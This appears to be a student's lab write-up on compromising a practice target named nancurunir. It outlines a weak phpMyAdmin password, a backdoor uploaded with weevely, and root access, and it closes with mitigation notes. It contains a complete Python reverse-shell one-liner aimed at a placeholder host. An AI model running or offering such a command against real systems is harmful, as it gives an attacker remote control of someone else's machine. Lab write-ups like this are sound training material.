Lab 10.2: Exploiting nancurunir

Target: nancurunir.shire.org

Target IP Address

Open Ports

Discovered Vulnerabilities

Php version 4.8.1

How you achieved a foothold

Phpmyadmin user password, password was `shallnotpass`

Root user password:

Using 50457 to upload backdoor

Backdoor made

Back door uploaded

Connect to back door

Create a reverse shell in weevely:

export RHOST="HOST";export RPORT=PORT;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

How you achieved root/Administrative level compromise

Foot hold using the gandalf user:

User Flag

Root Flag

How might the vulnerabilities be mitigated by the system administrator?

Not using the same mysql root password as host root as well not having a gif on the homepage of the website that is the same as the phpmyadmin user password.

Reflection

I did have trouble after I got access to the machine using weevely I forgot how to make have reverse shell to be able to leverage the gandalf user.

Report

https://docs.google.com/document/d/1bGgOkBr3Hc3sTCex6RufGkkZMEZJ-MWAhUrAFgsWHhM/edit#

PreviousLab 10.1: Linux - Permission Vulnerabilities NextLab 11.1: Metasploit

Last updated 2 years ago

hashtagTarget: nancurunir.shire.org

hashtagTarget IP Address

hashtagOpen Ports

hashtagDiscovered Vulnerabilities

hashtagHow you achieved a foothold

hashtagPhpmyadmin user password, password was shallnotpass

hashtagRoot user password:

hashtagUsing 50457 to upload backdoor

hashtagBackdoor made

hashtagBack door uploaded

hashtagConnect to back door

hashtagCreate a reverse shell in weevely:

hashtagHow you achieved root/Administrative level compromise

hashtagFoot hold using the gandalf user:

hashtagUser Flag

hashtagRoot Flag

hashtagHow might the vulnerabilities be mitigated by the system administrator?

hashtagReflection

hashtagReport